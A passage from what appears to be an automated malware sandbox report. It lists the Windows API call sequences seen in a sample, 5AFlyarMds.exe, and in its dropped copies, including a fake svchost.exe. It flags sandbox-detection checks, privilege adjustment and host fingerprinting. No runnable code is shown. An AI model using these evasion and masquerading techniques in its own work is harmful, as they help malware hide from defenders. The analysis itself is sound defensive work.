ile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 1_2_02C94B00
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F64B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 5_2_02F64B00
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02554B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 6_2_02554B00
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 8_2_025C4B00
    Contains functionality to compare user and computer (likely to detect sandboxes)
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402D30
    Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,1_2_00403A20
    Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,1_2_00402D30
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,1_2_02CA5720
    Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,1_2_02CB2BB0
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,1_2_02CB2B40
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,1_2_02C9D970
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,1_2_02C91170
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,1_2_02CB1690
    Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,1_2_02C91660
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,1_2_02C93610
    Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,1_2_02CACE10
    Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,1_2_02C97FD0
    Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,1_2_02CB3F50
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,1_2_02CB3CE0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,1_2_02CB1460
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,1_2_02CB25C0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,StrStrIA,1_2_02CAADE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_02F82BB0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_02F82B40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_02F61170
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,5_2_02F6D970
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_02F81690
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_02F61660
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,5_2_02F63610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_02F7CE10
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_02F67FD0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_02F83F50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_02F75720
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_02F83CE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_02F81460
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserNameA,memset,StrStrIA,5_2_02F7ADE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_02F825C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_02566CA0
